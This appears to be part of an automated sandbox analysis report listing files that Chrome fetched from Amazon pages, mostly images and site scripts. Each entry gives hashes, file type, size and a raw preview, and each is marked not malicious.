                                                                                                                                                                                                        SHA-256:BD02DAFB1E8029EBAA97BAF6CE9BCC89BFE5018285864A820CD8F19F82690D59
                                                                                                                                                                                                        SHA-512:59840B37892FC3BE4BFE2DAC5AD122D3B4FAFA48AFC727BF1E5568C237012CF4CBB8ECE39B63EBDBFEB9E7474B92A8CB6227434BF1DF26E56D6C091A4EBCB0C4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/617y0uaih6L._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........J.."...............................................................!...1AQaq."Br...#23s.......Rc...%4CSTu.D..............................................!."12..AQ..............?..t(S{...v{X.............'..K...;b|U..=..f.d..H.=..sU..w..M.y...<.$B.7.H...&.H.....|.,V.!.~I..."0(....u.....wA#.NRfq._V...(.&9..Q|...-.s......+.8..S....r.9.e.........".I.r.........I.c.q..@.o._..p.p....R....[....i.e}..s.>...T.....GX .L4.0.......g<.q...........s.....nB.|..;...NYt..b..]G......J0....X .....J..B.(.......c......'.Sv.w..Nlu.1.P.g.x...n.w.h.......#A.;6[(.. .$M&.3..S..pr.......C..z.........=..L1vF.~..C..L.:.QQ......R.t.e...\...34.!?*\+lr|C..y..*X...fT..-.v.NtD.._CUa.[eAm..........)WR.6..F...e;.......W..2.mpe..6.g,>..G.jm.{...P3A.sD..j.T........h=W....Nl..|..H.......n{...I.C.....d~..r4.....w.P$c...o#.TBY...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65449)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):289541
                                                                                                                                                                                                        Entropy (8bit):5.256566666002886
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:xmVqmVg4CumVHpmV9EmVNmVZRmVbVMmV9mVTmVsmVpmVpqqY6W:ESHmCqq6
                                                                                                                                                                                                        MD5:F758C25C0BC4E49CBF9A4C59CB5E3690
                                                                                                                                                                                                        SHA1:2591CC26A97246EDBB1BE9409CFE511D920D34B0
                                                                                                                                                                                                        SHA-256:A412B4E108D2A36D090528AC7A5A2144D1BDF7F7F293467A744864E1E1B6C074
                                                                                                                                                                                                        SHA-512:BC9D21F2BE8A95859E43AD3EDCA45CD54381265E4203E1C8E3FF048004BDBE4F2D0AF24A5B0C241C951776B152500387E9DC18C8E8A8E70264243B5876D88BB8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:/*! For license information please see main-e8dc46bd07f4d453b2cd.min.js.LICENSE.txt */."use strict";(self.discountWidgets=self.discountWidgets||[]).push([[179],{2318:(t,e,r)=>{r(506),r(7147);var n=r(745);function o(t){return o="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},o(t)}function i(t,e){for(var r=0;r<e.length;r++){var n=e[r];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,(i=n.key,a=void 0,a=function(t,e){if("object"!==o(t)||null===t)return t;var r=t[Symbol.toPrimitive];if(void 0!==r){var n=r.call(t,e||"default");if("object"!==o(n))return n;throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===e?String:Number)(t)}(i,"string"),"symbol"===o(a)?a:String(a)),n)}var i,a}var a=function(){function t(){!function(t,e){if(!(t instanceof e))throw new Typ
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2126
                                                                                                                                                                                                        Entropy (8bit):7.727551160854069
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rVDab2r5IGczX/BUktX8SzVwLc1qYgY6ssCecQOdj:Tyab2raXzZU2dBecxqbcQs
                                                                                                                                                                                                        MD5:39D4307D1E3F7E1011831A12EAF630CF
                                                                                                                                                                                                        SHA1:4C5D059985B30F4D92BE536FE827499D0B7C0455
                                                                                                                                                                                                        SHA-256:75CBE731B4F76EC56A97BF842AD9961D459408B7A820BC2B08C36C5C1DCFBD7A
                                                                                                                                                                                                        SHA-512:AFF0E1FB6804FECFBBE6BDFEDD8FB6823737445558A1ABA8E357610FEF017714278DCCAE93D77C6E9BA12322F3BA5C5CF212A7E03A5C3FC92D066486305C7AFF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_True_1x._SY116_CB659040113_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........z.....................................................!1Aa.."Q..2q.r........$BRb.....................................................?....................f...]+........f.+.................WEc...Y.bw].P7...w&1..x(....s.{.u.....N.D:7P7.:..nl>.(#..c..1..^.........^i.eL.&*,...6E(x.X..cO......$.....k..w...Zj.un...i.w....=f8....e....w...-.,>.%..{...s..I.I<I]..rWHyt..j....f...r.^...m:.8o0:....k. K%L..L.7.o}......q.b..T..(..""." *..... (...Y.nfIe..d,..:<.......g..JA=.rI..E.(|L....@p.bt........Ap.4>#p_..._..I.O.C..j..o..uj[<.5.G.4w:. k.q+X,x."^.]...........c..[.....wW{8y...U...#..A(3L$..?....5.3..G..i.1.<...Ylq.gQ.B..<..3N..|.......O..N........^.=0G.G.......jO.."".....v..!....Q.]#....^=.%.*`..Eh.$...Mv.X._.....R..f.....jwD?.1.{.&5....o.q{'.w...%..v.7k....N.vY.P..z;........kF.2Tq.W..O...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x500, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):26619
                                                                                                                                                                                                        Entropy (8bit):7.971253614769683
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:mZFwuCwpjVrNtl7tpOIjPl2VhQQFaHoPU:KttjVRtl60s0xH
                                                                                                                                                                                                        MD5:B08CF8E389FDD494EA6C2EBE4D7A2131
                                                                                                                                                                                                        SHA1:7B31946447EF0FC3A52216BC8CDDB94B1559A4BF
                                                                                                                                                                                                        SHA-256:7E8108B191AFDFB28308AE4401375CAAAC5C811C27C11AC3505D535A654A1495
                                                                                                                                                                                                        SHA-512:1BAA0449D6321C52AD15FFC5BDCC64B2D418C729A6C827F7F04A2830A8581A33AD5C00553773FFE4A249451378A04AF8C0AC74407FFB53D70D383C37A3A06C13
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........6...................................................................d..:....!... .SN.w.\...J>F .p.=$.#\.;8...."X...d5..N..,.'#.MQ.c...s.7.7.....b.^oF..h....<...,2....y....@<..E.....j=..gsN...7o...,.t.1.l....Y.L..|x..{....2@....dz<.e..D............zh.........v)...Q.......:.l......B)DGFA.a...c.J.7GH.....>s.t..r.u .../G6E.Jn.L..."...5......`.$..4.....C.0.?........z.i..$..].............(q]ZUuz`.8.....o..Z........$p=....H.;...8y.[..s.y..|.. ..@...9..^E.[.Kn.L......^.r..x.........m.}..lj..?Ai.m/..5../....Lu.g7.%:.a.....4.....$t.._tz`.:.....k..Z.......8..F...&.&...L.....z.o......j...o..<Z..r+.....F....%N.5:.]Z./V..1......W.~....R=q4T...Y.............yz.\.....#....F.Eu..c..S.......0O.....6.P".>..+.....l.-`......7.y.+....Q.....r..1L...a.......:.E.7C....O.{.R..{.......b.9r....&.x^.(./
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13218
                                                                                                                                                                                                        Entropy (8bit):7.864034228159954
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:E++Fig5KfN74L1XzqzZgJXZiWGqG2KxKne1YxBU7YlpWnFGes8T8squWESbljEi2:7+04xXVX8YrBUMbUFGes8osquaowQ5EY
                                                                                                                                                                                                        MD5:EFFFF114D0586635AFBBA9DF43E7CB5B
                                                                                                                                                                                                        SHA1:77B21281CCA6A50FB939E2D58D82A626A88E4CBA
                                                                                                                                                                                                        SHA-256:CA262FCFBCE803D40BBA897B0DB44BA02454A6ADE29CB98279BDC5D1EF77558F
                                                                                                                                                                                                        SHA-512:D3B4EE80987D0B8311652F7C9E3068157E351EFAC356FF3B2B0485C905296E07AE04D8327468CF95885D2278BCA9EBE6161D0E6A9C2B3DB0BAD29EA9B2269C8A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR..............$....8PLTEGpL.y!.y!.y!.z".y!..%.:.o<..z".{#....^.J....z .......y!....z!.y!.....z"......ossnrrQegJNNAKLIMM[^_JNNIMM....tP.........OSS..........GLMJNNBFFJNNJNNINN...JOP...JNN...~.....JNNIMM...IMM...................x..~.pss.q...........y!.{".z!...z".........z"..&......G..C...y!.y"..8.z!.y..:..9..9..._.L6.....}b.......htRNS.?.. .....o..........`...Q....>. ..............Kt............^..................w...H.f.................s....1.IDATx...E..0.CQS.a...s.Q.....hW...i.....B....5....;`...6......w.{.....:......x......5.x...J.R.f!..)...i.<.\$-..M.)...i.<T".8....5.x.4.NDB..u..#...6.B+V;+%.._......D.Ke....o.{E.1.<.M.G......4.......u..p...4'..p.....416$8q...)...B...B..C .R.K.~...G.=H..._.3......AS..o..8Bi....KW.s...Ei).~f...I..I.g......w.z.......i.k..,......h,......>.2.~....}iT..}*)..-......Os..S&..P{i..(8.Z....$.8....YJ...+.K/5......."...}:P...P{....g...4#.|.3v`..SHruI.PA..C~~.6..).Z].S*(..pDw.....q........D..ZY...,....\..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 169x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10632
                                                                                                                                                                                                        Entropy (8bit):7.961860501474742
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:x3A9++vQQlh/cLkCyqNORb9ez62dK6iNYq7RZ6yPl3+bxPJz6xB/mYG+/S2FQ1FV:KvQQLp1Ez7U60nb6il3sPoxB/zS2EJj
                                                                                                                                                                                                        MD5:F9996ABFCFEAE3EB5326DEA1731C3EF1
                                                                                                                                                                                                        SHA1:8EBF32DE68A5AA28CB7E210E76AB31B6B5C23C59
                                                                                                                                                                                                        SHA-256:80668D4A9771C5044686D2F810599A9FF0384E6C829B9BAF42A3529B406F8AA3
                                                                                                                                                                                                        SHA-512:46287019A8C3AF778EE4ABF71128189CA0D84A0DD03B2E41FC1B8852437A89F7FB2B0A44A4495673A3CA0AA66A341440BB1D8DA7BE1AC9499F57521206770F6C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71x9vjwX9IL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1.."2AQa.q...#Rrs....3BCDdt....4...&5Sb.......%T................................................!1.Aq..3Q..#Ra"......$2Bb..............?..*P.w..1...iM.0.mk..H.#n.7....r......?...4..][>.s.$2...=...@.....R.Z3.6|.b.3Q...`.twX..{.i..........I.iP..XG....x..zn....x....=3..Y..M.J.".R..}.^K.D.P0t......U.o..R............W.......U........u..3..7u........qM.J.{dV..3...WT `.*..1..........^.(}....V..n....S...q.M......T.]..QA.......i.Rv...SmF8.{..i...;4.,qG..^G`...T.c.P...>..pB.K.bu|M.....vWk.#.>2..........).q.6Vq$.I<!.%V.....*...[.q.*/U..r>m..(...(.......`...}.u...}.Z..}-...T.7..$._.i6s.....Q.}......,.~oAX.7..J?R7....2hm..\T]?Fh..l.3o.....$..d....J3a..Z..+...n.{~.a[....v.#.........."}.+FO.:m.[.U..........Bh..D....x....Of......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (391)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2073
                                                                                                                                                                                                        Entropy (8bit):5.5217451089062894
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:uQtgok9mgoksITlvsduD3uD1uD1uDs+gEvW2oNo/OcXRsaRdOXduSYpSzJS:uQ+3f3lh0UDeDsDsD8EO3+/OciaRdYJe
                                                                                                                                                                                                        MD5:07F3BBAE3312B76D3A76B274E03D3F0C
                                                                                                                                                                                                        SHA1:2D85782448AD21736AA6093D3FC5D02C48A91591
                                                                                                                                                                                                        SHA-256:C47691A714391803F4A58CB0400DB014EF031FA64EA282235BE2035299707EEB
                                                                                                                                                                                                        SHA-512:C93FE5EAD1424F7D4632799DE34AD06A35E23763E28142E7A0A4337F430F0E43D3AC858B4B518945DF89E0CD0FA174462F12A594D5791BBDD120E4FD84418106
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(f) {. var haveAUI = typeof P !== 'undefined' && P.AUI_BUILD_DATE;. if (typeof SiegeCrypto !== 'undefined') {. if (haveAUI) {. P.now('siege-cse').register('siege-cse:profile:AuthenticationPortalSigninEU', function(lib) {. return f(lib || SiegeCrypto);. });. } else {. f(SiegeCrypto);. }. } else if (haveAUI) {. P.when('siege-cse').register('siege-cse:profile:AuthenticationPortalSigninEU', f);. } else {. var err = new Error('CSE library not loaded, and no AUI');. try {. ueLogError(err, {attribution: 'siege-cse:profile:AuthenticationPortalSigninEU', logLevel: 'WARN'});. } catch (e) {. throw err;. }. }.})(function(SiegeCrypto) {..SiegeCrypto.addProfile("AuthenticationPortalSigninEU", {. "password": {dataType: "AuthPortalSigninPasswordEU", requiresTail: false},. "passwordCheck": {dataType: "AuthPortalSigninPasswordEU", requiresTail: false},. "passwordNew": {dataType: "AuthPortalSigninPasswordEU", requiresTail: false},.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2942
                                                                                                                                                                                                        Entropy (8bit):7.849856761083459
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6h38mZNGCTNOXjgHKwmu3MKu25EbuW0dd074tSvcCkWKXiR8KR7j1g40AzCF:T1P3NT4X0qK3a25iyddNSvZDKXiJR35q
                                                                                                                                                                                                        MD5:B94520DCDD902EA40B08529B42CBA1AD
                                                                                                                                                                                                        SHA1:9FF59D810E8799AD0FE681AB04EDE826BF8FA2CA
                                                                                                                                                                                                        SHA-256:C4A690FAADC584BDDF8899AE97CCED2A6BB7D0BB95A715623D15E922D8342AA2
                                                                                                                                                                                                        SHA-512:92BDDFE39A65CB8030870795702930CF3E62C95BDCD8DE491F95989949047E30548AB4A1C991810C93A3B65468EE1D2CAD63043E600A7F744325BABCAA60B914
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!1.R."2AQaq.........#%3BCSdru......6DT..$5bct..............................................Q..1.!a...2............?..h.................%...vD.?.A.....o.57......_53.......{<c}(>..30.8ska5`.....p.l...,.." ""." "/.A...A....................a.c...ce..E...v.+./..0..m-<s..w...-"...)T.E.b..D~(.+.**Y..<...Hp...l,E.....t.e.J...Ky...<))...=e.^#..s.h.k........5...*}.......g.-......3b..A...Wz.G.E/<..3^..>..N..y8.}Ns.fsZ...v...=.Fnj..Xp""." ""....x..8.f.. pY.c....9e]\.;K7K3"6#v.A.b....1..y=`.u8......;...w.5T.5.Z..A..COR:bI..p..Z.......K.U.<.R.:.$B.zM0..:.>.TI/%.+...`.k_e.....i}...Gz.d$...S..P......O..f..X.f.....4....xg#.h..9.?.Dc.iC.{.\.K.1.."\*.EK...R...s..P.X~m..Q#$ru...1A.~..Ni...T1k..3.E=I&...uA...c0.$,..3..9..w...+.GNG.7..B..R.I.f7D6.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):53960
                                                                                                                                                                                                        Entropy (8bit):7.990170215257627
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:1536:5MxkxDbX4jnwFgjZlSibc4atMcMC372EgWBaeExc:ykxXXEwFOlSib/m72EgWIO
                                                                                                                                                                                                        MD5:9C9B12806288D544EF3B607FCD2E89AF
                                                                                                                                                                                                        SHA1:A22E8524A6882F0F125E25D4CCFCA91CBAC859CA
                                                                                                                                                                                                        SHA-256:85E95450DF5F106C057F1B39C051D4F80D834298A260F73E1A473B0988D31F5E
                                                                                                                                                                                                        SHA-512:1B968479609090DE721EDABBAF25F62F2200BA9A74F60E65BA531B157F0B225B4E618ECDDFAE268C6BC1E6D245923AECFA68E55261B804D22E7707110956B92B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..TXZY.................U.....SWYXY[ZZ\[VXW..R[]\UWV......\^]TVU..V...]_^......SUT...^`_..M..Q...RTS`ba......_a`..P..OQSR...".=...PRQMONOQP........Vdfe#/>$0?..Y.....L..Q...KLLJKJbdcPPP.....M798RRR&2@?A@LMM...ABB. 0.(7:<;..)<==...DFENOO....."....$4565..%.+:.........021'3B.....W..T...CDCgih...=?>UUVHJI)5D.....,......-.-......EGGGIH.........UUUVWWTTT.........;FSWXZmol......j-...Q.....U...[doZZZiq{VWY...........j.....|...(*)XYY...YZ\XWW..Q......p3...n..:..\a)..../:H...RSUPQS..c{........Z[]......X...USS..$...........................|~s.....W..D..\......JT`..........Vv=+..VHHH..d..^..{5@N...aju#%$t|...eQZfuxe^:*..TQTR..P...\\\FFFTRS..3..l..n...V_k..g.....uO.....R%...zT/"..L..vEO\...@KX..m..{..q.....a.sJ.."..\iO:be`..0..M..B..LF... ...6..Y..x}U=.....m..^...F'..aO/cfH.. .IDATx..=..Y... ..U.(....TT!)..X.(\.......*0...;0..h3;i..0^h......N.......M....h.....{o.$[=.0.i.T_...{.{...........W...aq..!...e..........?E4...h.i...hu\.:#....J...s....qq.\....$.0
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 165x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10719
                                                                                                                                                                                                        Entropy (8bit):7.968903858738702
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:KgpQmAy03FpMJBCaSj0MSd/MeSgSS63FyUXLTmxfnMoX0gLzavbWHEM6J9RDgvIR:KXmAy03FGWdoRSeSgM3FyUXfm2vgL0PP
                                                                                                                                                                                                        MD5:ACD4827861DECF6A9A105F05D35F8B94
                                                                                                                                                                                                        SHA1:9874D4FA6FCCC2CE6E9EF5936EC77AAEE3E0AAD4
                                                                                                                                                                                                        SHA-256:526CEC174ABDF218E627C58629F45CC044D791CE3EEB2318894820B56759925D
                                                                                                                                                                                                        SHA-512:92A06FA17CF15790688C29359C7F6AB40D5D4ADA553DE30B7A52BFBA9973DE164C08E27052414B50ACE7EE51BA157616105F40F0A13E89110CB36B43A0E35218
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71GWDQsQzaL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!1."A..Qaq#2B.......3CDU......$%RSTcrt.....4E...bd.5su....................................................!1Q...ARa....."#2q...3B...............?.9v.........uc..N.....vf...q.C....a.c....-..Y......2..9,..mHU...p./62_.c6#.#.......Yu,+.{>.r{s.....o......v...!..L.R....B..7.l...:2..=v...(.h....5.x.:Y..b.U..s...o..........aC.y.\/.wk.XL...iq..[U....O..l..o.5.>..8#.%.1..3$.Qp.+[+-...K.#....1.a......*..nyJ.K&^.........}%..i...O.5.......c..ZEO|@.e..F..k>..}.i:.....km.....>..3...,..[..Y"...+e^N...PN.Q.7/7..La....@T.;S.A...Q.O.(.c...[7.|.....K.<,Fr..KG....{....fq.U..%.... ...X...P..~G...{U........LQs|..&6.h.'.....c...# ....K.E....8`. ..X..3..zh?d.,.^S....h.'...7.Y-.........yTR5.e.I....g.%.-....MjR..W,s5......%...`...-...z...=b.,..v.??.<..8...\.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):71
                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6950)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):263193
                                                                                                                                                                                                        Entropy (8bit):5.398223615352051
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:14+ME+AneR9yT5VoSjzppWCqfgEpNg4syp1kAs6aOb8lY6HEbrcaJn9Bed7oX/z4:14+ME+AnpT56SjzppWCqfgEpNg4BrkAE
                                                                                                                                                                                                        MD5:51D454DF00DBE6104CD24476C0405FF3
                                                                                                                                                                                                        SHA1:92BDEFC136C32CB8009F61503DB294A8CB0698CB
                                                                                                                                                                                                        SHA-256:E9681976FDD4F0051427351564B6922798CDD0EA3E1F6FFD868A55D6F7F261BF
                                                                                                                                                                                                        SHA-512:E9AC988864AA3CC325AAF53F949F59832E5E31C012AB383018825B0E4C80764F9A1D55B750EB833528D70A86D221440966F9B7BBFABAE7F7F7BCEA6F6EEF4A88
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/81DWyqy1KcL.js?AUIClients/FWCIMAssets
                                                                                                                                                                                                        Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 213x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11763
                                                                                                                                                                                                        Entropy (8bit):7.959287963633669
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:06e1FZNciE5ReGKurDsmVMDSu26HVKJMIJkGwwQoDI3h6WpXlnmX1iQ53XQ7G46D:06e1F3ciEzbKQDsGMDFlKKBWQdoS1mFR
                                                                                                                                                                                                        MD5:95396C959D6AF843C43CDB1FBCD54BA4
                                                                                                                                                                                                        SHA1:EFE914C7F6B7C1346801513B1CD78888E3787E23
                                                                                                                                                                                                        SHA-256:4AEBA303F563C3B74DAB8F69F5AA18B9E081525720F3D6333492162CECF5CE35
                                                                                                                                                                                                        SHA-512:23533365C65BBCC52ECB531BAE5587440421BBF5EBF14C3058DC7F2115C0AE56F11146208CCB6E83E7E06BA3AA809B720238B4A1F24734A3922991EF93A82803
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/61OaibCCrKL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1.A.."2Qaq.#...3BR....$br..cs......4ST....................................................!.1A.#2B.aq..............?..tQE.E.P.QE.E.;.....rx....t..u:B..R:.8..*.}.g..r.U....a..{.f_..o=..-..N.mv.k$....~hk+....d.#...V.....v.0......?....._i.".-....\.?.,...\.X.|..I.N......h5........KH..$...._._j~....x.'"..E.0.a7......K.....@,@.8.jf:f.W..d.m.J.U.......=zI...../s...d..l...M....*.......5H..S... ....hV:..Cw.......h.....U.m.P{B...f1.....Ej...89.w^..\...Q................J...^....4{r...x?....$.p%.H....p.p..%9}.1.....8..F......_..L..6.>3....~8L....z...l.6....A.....rB.a.#.R>..S.3...&.....G..=......|....../e...<..;.1.....jV..\.J.."..).._k..D..QE.E.P.QE.P>.....4]...^......`........!..N...^.X..@.Dx ..o.._.ph.>.....X;.'.g...j...y...w'#.i.Lc...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):10733
                                                                                                                                                                                                        Entropy (8bit):7.885934182718208
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Ym0kcHGqaV4LMM67mdanbf/gmmj2HiZrPRGmU3r8r93rZlS2oztBfubDX8PbmtYD:PoHGqaV4LxonjgmFkrPQTr8r9jSR1ABC
                                                                                                                                                                                                        MD5:41E60F7A1D6139539601FABD8F36C3CB
                                                                                                                                                                                                        SHA1:1F3F310B59336A8AF90875ED9BB4B09AC2185ED3
